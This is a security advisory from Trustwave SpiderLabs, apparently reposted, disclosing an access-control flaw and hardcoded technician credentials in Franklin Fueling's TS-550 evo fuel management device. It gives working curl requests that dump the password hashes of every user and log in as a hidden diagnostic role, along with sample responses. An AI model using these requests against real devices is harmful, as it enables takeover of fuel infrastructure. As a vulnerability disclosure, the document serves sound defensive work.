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Franklin Fueling's T550 Evo Access Control / Credentials

Matthew Jakubowski
Security Risk Medium
web applications
Date add
Trustwave's SpiderLabs Security Advisory TWSL2014-001:
Multiple Vulnerabilities in Franklin Fueling's TS-550 evo

Published: 01/03/2014
Version: 1.0

Vendor: Franklin Fueling Systems (http://www.franklinfueling.com/)
Product: TS-550 evo device
Version affected:  Firmware confirmed.  Affects prior to version

Product description:
A fuel management system with a programmable interface used for inventory
and delivery management.

Finding 1: Insufficient Access Control
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7247
CWE: CWE-200

As the Guest user (the lowest privilege), a user can post the
cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the
usernames and password hashes (in DES format) for all users of the
application. Once dumped, they can be cracked and used to access
authenticated portions of the application.


curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi


<TSA_RESPONSE_LIST VERSION="" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
        <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
        <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
        <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>

Finding 2: Hardcoded Technician Credentials
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7248
CWE: CWE-798

The three primary users on the TS550 are roleGuest, roleUser, and
roleAdmin.  Another user exists with additional access named roleDiag. This
user can access extra portions of the application such as the command line
interface, enable and disable SSH, as well as run SQL commands all from the
web interface.  The CLI interface includes the ability to run engineering
and manufacturing commands.  The password for roleDiag is the key (a value
returned with every POST request to tsaws.cgi) DES encrypted.  This can be
done in Ruby:

$ irb
1.9.3p374 :001 > "11111111".crypt("aa")
 => "aaDTlAa1fGGC."


curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi

#Response (note the ROLE)

<TSA_RESPONSE_LIST VERSION="" TIME_STAMP="2013-03-04T16:53:01Z" TIME_STAMP_LOCAL="2013-03-04T11:53:01" KEY="11111111" ROLE="roleDiag"><TSA_RESPONSE COMMAND="cmdWebCheckRole"></TSA_RESPONSE></TSA_RESPONSE_LIST>

The password can then be used to run various roleDiag commands. An attacker
can enable SSH, and since root's password is the same as roleAdmin, they
can completely compromise the device.

Remediation Steps:
According to Franklin Fueling, version 2.4.0 mitigates these
vulnerabilities. However, Trustwave SpiderLabs have not verified this fix.

Revision History:
04/16/13 - Vulnerability disclosed to vendor
12/18/13 - Fix released on a limited basis by vendor
01/03/14 - Advisory published

1. http://www.franklinfueling.com/evo/

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